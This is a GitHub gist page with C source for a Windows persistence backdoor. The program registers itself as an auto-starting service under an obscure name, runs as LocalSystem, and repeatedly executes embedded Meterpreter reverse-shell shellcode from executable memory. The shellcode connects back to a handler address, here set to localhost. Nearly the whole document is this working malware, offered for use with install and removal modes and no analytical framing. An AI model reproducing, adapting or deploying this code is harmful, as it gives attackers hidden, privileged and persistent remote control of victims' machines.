Created
October 7, 2018 09:13
-
-
Save Green-m/1e3c4a4170d99e1c741dafc3bc4e15be to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <windows.h> | |
| #define SERVICE_NAME "DhcXrk" | |
| #define DISPLAY_NAME "QyucjlZIin" | |
| #define RETRY_TIME 5 | |
| // | |
| // Globals | |
| // | |
| SERVICE_STATUS status; | |
| SERVICE_STATUS_HANDLE hStatus; | |
| // | |
| // Meterpreter connect back to host | |
| // | |
| void start_meterpreter() | |
| { | |
| // Your meterpreter shell here | |
| unsigned char buf[] = | |
| "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" | |
| "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" | |
| "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" | |
| "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" | |
| "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" | |
| "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" | |
| "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" | |
| "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" | |
| "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" | |
| "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" | |
| "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54" | |
| "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x7f\x00\x00\x01" | |
| "\x68\x02\x00\x11\x51\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50" | |
| "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" | |
| "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67" | |
| "\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff" | |
| "\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00" | |
| "\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56" | |
| "\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58" | |
| "\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5" | |
| "\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85" | |
| "\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1" | |
| "\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; | |
| LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
| memcpy(buffer,buf,sizeof(buf)); | |
| HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL); | |
| WaitForSingleObject(hThread,INFINITE); | |
| CloseHandle(hThread); | |
| } | |
| // | |
| // Call self without parameter to start meterpreter | |
| // | |
| void self_call() | |
| { | |
| char path[MAX_PATH]; | |
| char cmd[MAX_PATH]; | |
| if (GetModuleFileName(NULL, path, sizeof(path)) == 0) { | |
| // Get module file name failed | |
| return; | |
| } | |
| STARTUPINFO startup_info; | |
| PROCESS_INFORMATION process_information; | |
| ZeroMemory(&startup_info, sizeof(startup_info)); | |
| startup_info.cb = sizeof(startup_info); | |
| ZeroMemory(&process_information, sizeof(process_information)); | |
| // If create process failed. | |
| if (CreateProcess(path, path, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, | |
| NULL, &startup_info, &process_information) == 0) | |
| { | |
| return; | |
| } | |
| // Wait until the process died. | |
| WaitForSingleObject(process_information.hProcess, INFINITE); | |
| } | |
| // | |
| // Process control requests from the Service Control Manager | |
| // | |
| VOID WINAPI ServiceCtrlHandler(DWORD fdwControl) | |
| { | |
| switch (fdwControl) { | |
| case SERVICE_CONTROL_STOP: | |
| case SERVICE_CONTROL_SHUTDOWN: | |
| status.dwWin32ExitCode = 0; | |
| status.dwCurrentState = SERVICE_STOPPED; | |
| break; | |
| case SERVICE_CONTROL_PAUSE: | |
| status.dwWin32ExitCode = 0; | |
| status.dwCurrentState = SERVICE_PAUSED; | |
| break; | |
| case SERVICE_CONTROL_CONTINUE: | |
| status.dwWin32ExitCode = 0; | |
| status.dwCurrentState = SERVICE_RUNNING; | |
| break; | |
| default: | |
| break; | |
| } | |
| if (SetServiceStatus(hStatus, &status) == 0) { | |
| printf("Cannot set service status (0x%08x)", GetLastError()); | |
| exit(1); | |
| } | |
| return; | |
| } | |
| // | |
| // Main function of service | |
| // | |
| VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv) | |
| { | |
| // Register the service handler | |
| hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler); | |
| if (hStatus == 0) { | |
| printf("Cannot register service handler (0x%08x)", GetLastError()); | |
| exit(1); | |
| } | |
| // Initialize the service status structure | |
| status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS; | |
| status.dwCurrentState = SERVICE_RUNNING; | |
| status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN; | |
| status.dwWin32ExitCode = NO_ERROR; | |
| status.dwServiceSpecificExitCode = 0; | |
| status.dwCheckPoint = 0; | |
| status.dwWaitHint = 0; | |
| if (SetServiceStatus(hStatus, &status) == 0) { | |
| printf("Cannot set service status (0x%08x)", GetLastError()); | |
| return; | |
| } | |
| // Start the Meterpreter | |
| while (status.dwCurrentState == SERVICE_RUNNING) { | |
| self_call(); | |
| Sleep(RETRY_TIME); | |
| } | |
| return; | |
| } | |
| // | |
| // Installs and starts the Meterpreter service | |
| // | |
| BOOL install_service() | |
| { | |
| SC_HANDLE hSCManager; | |
| SC_HANDLE hService; | |
| char path[MAX_PATH]; | |
| // Get the current module name | |
| if (!GetModuleFileName(NULL, path, MAX_PATH)) { | |
| printf("Cannot get module name (0x%08x)", GetLastError()); | |
| return FALSE; | |
| } | |
| // Build the service command line | |
| char cmd[MAX_PATH]; | |
| int len = _snprintf(cmd, sizeof(cmd), "\"%s\" service", path); | |
| if (len < 0 || len == sizeof(cmd)) { | |
| printf("Cannot build service command line (0x%08x)", -1); | |
| return FALSE; | |
| } | |
| // Open the service manager | |
| hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE); | |
| if (hSCManager == NULL) { | |
| printf("Cannot open service manager (0x%08x)", GetLastError()); | |
| return FALSE; | |
| } | |
| // Create the service | |
| hService = CreateService( | |
| hSCManager, | |
| SERVICE_NAME, | |
| DISPLAY_NAME, | |
| SERVICE_ALL_ACCESS, | |
| SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS, | |
| SERVICE_AUTO_START, | |
| SERVICE_ERROR_NORMAL, | |
| cmd, | |
| NULL, | |
| NULL, | |
| NULL, | |
| NULL, /* LocalSystem account */ | |
| NULL | |
| ); | |
| if (hService == NULL) { | |
| printf("Cannot create service (0x%08x)", GetLastError()); | |
| CloseServiceHandle(hSCManager); | |
| return FALSE; | |
| } | |
| // Start the service | |
| char* args[] = { path, "service" }; | |
| if (StartService(hService, 2, (const char**)&args) == 0) { | |
| DWORD err = GetLastError(); | |
| if (err != ERROR_SERVICE_ALREADY_RUNNING) { | |
| printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err); | |
| CloseServiceHandle(hService); | |
| CloseServiceHandle(hSCManager); | |
| return FALSE; | |
| } | |
| } | |
| // Cleanup | |
| CloseServiceHandle(hService); | |
| CloseServiceHandle(hSCManager); | |
| //printf("Service %s successfully installed.", SERVICE_NAME); | |
| fflush(stdout); | |
| return TRUE; | |
| } | |
| // | |
| // Stops and removes the Meterpreter service | |
| // | |
| BOOL remove_service() | |
| { | |
| SC_HANDLE hSCManager; | |
| SC_HANDLE hService; | |
| SERVICE_STATUS status; | |
| DWORD err; | |
| // Open the service manager | |
| hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT); | |
| if (hSCManager == NULL) { | |
| printf("Cannot open service manager (0x%08x)", GetLastError()); | |
| return FALSE; | |
| } | |
| // Open the service | |
| hService = OpenService(hSCManager, SERVICE_NAME, SERVICE_STOP | DELETE); | |
| if (hService == NULL) { | |
| printf("Cannot open service %s (0x%08x)", SERVICE_NAME, GetLastError()); | |
| CloseServiceHandle(hSCManager); | |
| return FALSE; | |
| } | |
| // Stop the service | |
| printf(" * Stopping service %s", SERVICE_NAME); | |
| fflush(stdout); | |
| if (ControlService(hService, SERVICE_CONTROL_STOP, &status) == 0) { | |
| err = GetLastError(); | |
| if (err != ERROR_SERVICE_NOT_ACTIVE) { | |
| printf("Cannot stop service %s (0x%08x)", SERVICE_NAME, err); | |
| CloseServiceHandle(hSCManager); | |
| return FALSE; | |
| } | |
| } | |
| // Delete the service | |
| printf(" * Removing service"); | |
| fflush(stdout); | |
| if (DeleteService(hService) == 0) { | |
| printf("Cannot delete service %s (0x%08x)", SERVICE_NAME); | |
| CloseServiceHandle(hSCManager); | |
| return FALSE; | |
| } | |
| // Cleanup | |
| CloseServiceHandle(hService); | |
| CloseServiceHandle(hSCManager); | |
| printf("Service %s successfully removed.", SERVICE_NAME); | |
| fflush(stdout); | |
| return TRUE; | |
| } | |
| // | |
| // Start the service | |
| // | |
| void start_service() | |
| { | |
| SERVICE_TABLE_ENTRY ServiceTable[] = | |
| { | |
| { SERVICE_NAME, &ServiceMain }, | |
| { NULL, NULL } | |
| }; | |
| if (StartServiceCtrlDispatcher(ServiceTable) == 0) { | |
| printf("Cannot start the service control dispatcher (0x%08x)", | |
| GetLastError()); | |
| exit(1); | |
| } | |
| } | |
| // | |
| // Main function | |
| // | |
| int main(int argc, char *argv[]) | |
| { | |
| if (argc == 2) { | |
| if (strcmp(argv[1], "install-service") == 0) { | |
| // Installs and starts the service | |
| install_service(); | |
| return 0; | |
| } | |
| else if (strcmp(argv[1], "remove-service") == 0) { | |
| // Stops and removes the service | |
| remove_service(); | |
| return 0; | |
| } | |
| else if (strcmp(argv[1], "service") == 0) { | |
| // Starts the Meterpreter as a service | |
| start_service(); | |
| return 0; | |
| } | |
| } | |
| // Starts the Meterpreter as a normal application | |
| start_meterpreter(); | |
| return 0; | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment